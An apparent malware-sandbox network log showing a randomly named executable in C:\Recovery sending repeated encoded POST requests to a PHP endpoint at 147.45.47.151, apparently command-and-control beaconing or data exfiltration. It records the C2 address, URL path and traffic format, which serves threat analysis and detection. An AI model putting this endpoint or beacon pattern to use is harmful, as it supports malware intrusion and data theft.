                                                                                          Dec 10, 2024 07:28:42.990257978 CET | 344 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:43.335202932 CET | 2512 | OUT
                                                                                          Dec 10, 2024 07:28:44.244064093 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:44.481054068 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:44 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          23 | 192.168.2.8 | 49739 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:44.735332012 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:45.134495974 CET | 2512 | OUT
                                                                                          Dec 10, 2024 07:28:46.002932072 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:46.237037897 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:45 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          24 | 192.168.2.8 | 49740 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:46.486129045 CET | 344 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:46.837968111 CET | 2512 | OUT
                                                                                          Dec 10, 2024 07:28:47.757304907 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:47.980964899 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:47 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          25 | 192.168.2.8 | 49741 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:48.655504942 CET | 344 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:49.007172108 CET | 2512 | OUT


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          26 | 192.168.2.8 | 49742 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:49.519457102 CET | 344 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1992
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:49.873718023 CET | 1992 | OUT
                                                                                          Dec 10, 2024 07:28:50.779553890 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:51.012898922 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:50 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          27 | 192.168.2.8 | 49743 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:49.672847033 CET | 344 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:50.022743940 CET | 2512 | OUT
                                                                                          Dec 10, 2024 07:28:50.937582016 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:51.172975063 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:50 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          28 | 192.168.2.8 | 49744 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:51.465725899 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:51.883992910 CET | 2512 | OUT | Data Raw: 57 5c 5f 58 5e 55 50 5d 58 57 5a 57 52 53 51 5c 5b 5d 5d 45 57 5e 50 55 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W\_X^UP]XWZWRSQ\[]]EW^PU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"', ^#9&#66)._0<<\'?"X:<$S>+X71(99.\%!Z+<
                                                                                          Dec 10, 2024 07:28:52.727351904 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:52.960665941 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:52 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          29 | 192.168.2.8 | 49745 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:53.233284950 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:53.677290916 CET | 2512 | OUT | Data Raw: 57 5e 5a 5d 5b 5c 50 59 58 57 5a 57 52 52 51 50 5b 5b 5d 44 57 5f 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W^Z][\PYXWZWRRQP[[]DW_PX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"\&!:Q!=^=>?[0/7'\+".:+8;)X ?:).\%!Z+
                                                                                          Dec 10, 2024 07:28:54.491266012 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:54.725727081 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:54 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          30 | 192.168.2.8 | 49746 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:54.971955061 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:55.319562912 CET | 2512 | OUT | Data Raw: 52 5e 5a 5a 5b 58 55 5d 58 57 5a 57 52 53 51 52 5b 58 5d 41 57 5f 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R^ZZ[XU]XWZWRSQR[X]AW_P[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"^&<<\7-!&(.+Z0?\39$R5Y(+#**7-.\%!Z+<
                                                                                          Dec 10, 2024 07:28:56.235207081 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:56.469012022 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:56 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0
                                                                                          Dec 10, 2024 07:28:56.741139889 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:57.107562065 CET | 2004 | OUT | Data Raw: 52 5c 5f 53 5e 59 55 5d 58 57 5a 57 52 57 51 55 5b 5e 5d 42 57 51 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\_S^YU]XWZWRWQU[^]BWQP]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"\2<7#-6&)=/'<8]3976:)()_77]-.\%!Z+,
                                                                                          Dec 10, 2024 07:28:57.142929077 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:57.644803047 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:57 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 26 03 20 00 34 04 32 30 20 1f 2f 32 2f 57 26 13 28 18 3d 54 2a 5c 32 01 27 5f 2e 0c 24 08 3d 04 3d 58 3c 39 37 0e 3f 2c 2b 53 30 0f 21 46 0c 1d 27 04 26 28 3d 06 24 5b 27 15 33 06 28 02 24 32 3b 15 2a 33 0d 0d 34 23 3b 5a 24 0a 27 0c 3b 04 36 55 2f 1b 3a 42 2b 22 3d 0c 32 38 22 57 0d 12 27 16 24 30 36 07 22 22 08 1c 21 1f 05 0b 28 1b 2f 02 33 00 3c 04 35 04 3a 02 30 31 06 12 34 51 28 5f 3f 38 2d 02 31 04 3a 50 33 01 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98& 420 /2/W&(=T*\2'_.$==X<97?,+S0!F'&(=$['3($2;*34#;Z$';6U/:B+"=28"W'$06""!(/3<5:014Q(_?8-1:P3 ^*+U?WT0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          31 | 192.168.2.8 | 49747 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:57.384627104 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:57.741681099 CET | 2512 | OUT | Data Raw: 57 5f 5f 5a 5e 5c 55 58 58 57 5a 57 52 50 51 50 5b 51 5d 45 57 5f 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W__Z^\UXXWZWRPQP[Q]EW_PX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!137!!P:*#Z'/$]0<6)+>>71(9.\%!Z+0
                                                                                          Dec 10, 2024 07:28:58.645900011 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:58.880788088 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:58 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          32 | 192.168.2.8 | 49749 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:59.642604113 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:59.991554976 CET | 2512 | OUT | Data Raw: 57 5f 5f 58 5e 5a 55 5b 58 57 5a 57 52 50 51 54 5b 59 5d 45 57 55 50 54 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W__X^ZU[XWZWRPQT[Y]EWUPT^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"^%Y0^7:*!P5_>>^$<3+ >&<8W*]9[#+..\%!Z+0
                                                                                          Dec 10, 2024 07:29:00.904056072 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:01.140784025 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:00 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          33 | 192.168.2.8 | 49750 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:01.377743959 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:01.953378916 CET | 2512 | OUT | Data Raw: 57 51 5f 58 5e 5a 55 5f 58 57 5a 57 52 5c 51 57 5b 59 5d 41 57 53 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WQ_X^ZU_XWZWR\QW[Y]AWSP]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z%4^#\:U!6)Y)7'Y<X'\<U!%\<; +8&718..\%!Z+
                                                                                          Dec 10, 2024 07:29:02.648700953 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:02.884995937 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:02 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          34 | 192.168.2.8 | 49757 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:02.772418976 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1984
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:03.128452063 CET | 1984 | OUT | Data Raw: 52 5c 5a 5a 5e 5a 55 5f 58 57 5a 57 52 53 51 57 5b 58 5d 40 57 5f 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\ZZ^ZU_XWZWRSQW[X]@W_P]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"_%/ 9%"*?[$Y('$5=%Z<8*;%X7X..\%!Z+<
                                                                                          Dec 10, 2024 07:29:04.033986092 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:04.268830061 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:03 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 26 07 23 17 27 5a 31 23 24 56 2f 0f 3b 13 25 13 05 45 2b 22 22 58 27 28 23 17 2e 54 2b 1c 3e 2d 0b 5d 28 14 02 57 2a 2f 23 10 24 35 21 46 0c 1d 24 14 27 3b 29 00 24 13 23 5f 27 01 23 5e 30 54 34 05 2a 23 28 50 34 23 0d 5b 30 1d 0a 55 3b 03 32 1c 2f 26 3d 1a 29 1c 25 0d 26 12 22 57 0d 12 27 1b 25 09 39 5b 20 0b 21 0f 36 31 20 53 2b 0b 02 13 33 3e 37 59 22 04 17 11 26 21 01 02 34 19 27 06 3f 02 22 5b 26 5b 2e 52 24 3b 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98&#'Z1#$V/;%E+""X'(#.T+>-](W*/#$5!F$';)$#_'#^0T4*#(P4#[0U;2/&=)%&"W'%9[ !61 S+3>7Y"&!4'?"[&[.R$; ^*+U?WT0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          35 | 192.168.2.8 | 49758 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:03.263283014 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:03.620769978 CET | 2512 | OUT | Data Raw: 52 59 5a 58 5e 55 55 5d 58 57 5a 57 52 50 51 51 5b 5b 5d 41 57 50 50 5e 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: RYZX^UU]XWZWRPQQ[[]AWPP^^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"[2, Z *:"Y),'?$)?"(+3)%7T'Y/).\%!Z+0
                                                                                          Dec 10, 2024 07:29:04.524220943 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:04.756673098 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          36 | 192.168.2.8 | 49765 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
